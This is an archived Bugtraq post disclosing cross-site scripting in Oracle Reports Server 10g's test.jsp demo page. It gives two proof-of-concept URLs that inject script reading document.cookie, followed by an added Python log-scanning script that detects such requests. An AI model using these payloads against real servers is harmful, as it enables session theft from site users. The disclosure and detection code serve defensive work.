
List:       bugtraq
Subject:    Oracle Reports Server 10g Vulnerable to  XSS
From:       Paolo Paolo <paolo.paolo () mail ! ee>
Date:       2005-03-24 14:23:10
Message-ID: 20050324142310.12492.qmail () www ! securityfocus ! com



Oracle Reports Server 10g (9.0.4.3.3) Vulnerable to Cross Site Scripting


#####################

http://paolo/reports/examples/Tools/test.jsp?repprod&desname='&lt;script&gt;alert(document.cookie);&lt;/script&gt;


http://paolo/reports/examples/Tools/test.jsp?repprod"&lt;script&gt;alert(document.cookie);&lt;/script&gt;


#####################
 
Paolo sends GREETS to Oracle secalert



Paolo
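
A defender can look for attempts against this demo page in web access logs. The sketch below is an added example, not part of the original post and not Oracle's code; only the path and parameter names come from the URLs above, while the log format, sample lines and function names are constructed for illustration.

```python
import re
from html import unescape
from urllib.parse import unquote_plus, urlsplit

# Path from the advisory's URLs; log format and sample lines are constructed.
DEMO_PATH = "/reports/examples/Tools/test.jsp"
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Any HTML tag opener; a report parameter has no reason to contain one.
MARKUP = re.compile(r"<\s*/?\s*[a-z!]", re.I)

def normalize(text, rounds=3):
    """Undo URL encoding and HTML entities repeatedly to catch double encoding."""
    for _ in range(rounds):
        decoded = unescape(unquote_plus(text))
        if decoded == text:
            break
        text = decoded
    return text

def suspicious_requests(log_lines):
    """Return (line_number, decoded_query) for demo-page requests carrying markup."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if normalize(url.path).lower() != DEMO_PATH.lower():
            continue
        # Scan the whole query string: the second URL in the advisory carries
        # the markup in the parameter name, so per-value checks would miss it.
        query = normalize(url.query)
        if MARKUP.search(query):
            hits.append((number, query))
    return hits

# Constructed sample log (documentation addresses, harmless marker payload "x").
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Mar/2005:14:01:02 +0000] "GET /reports/examples/Tools/test.jsp?repprod&desname=printer1 HTTP/1.1" 200 512',
    '192.0.2.44 - - [24/Mar/2005:14:02:10 +0000] "GET /reports/examples/Tools/test.jsp?repprod&desname=%27%3Cscript%3Ex%3C/script%3E HTTP/1.1" 200 640',
    '192.0.2.44 - - [24/Mar/2005:14:02:31 +0000] "GET /reports/examples/Tools/test.jsp?repprod%22%3Cscript%3Ex%3C/script%3E HTTP/1.1" 200 655',
    '192.0.2.44 - - [24/Mar/2005:14:03:05 +0000] "GET /reports/examples/Tools/test.jsp?repprod&desname=%253Cscript%253Ex%253C%252Fscript%253E HTTP/1.1" 200 640',
    '192.0.2.77 - - [24/Mar/2005:14:04:00 +0000] "GET /index.html?q=%3Cb%3E HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for number, query in suspicious_requests(SAMPLE_LOG):
        print(f"line {number}: {query}")
```

Hits on this path are also a reminder that the example pages shipped under /reports/examples/ should not be reachable on a production server.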

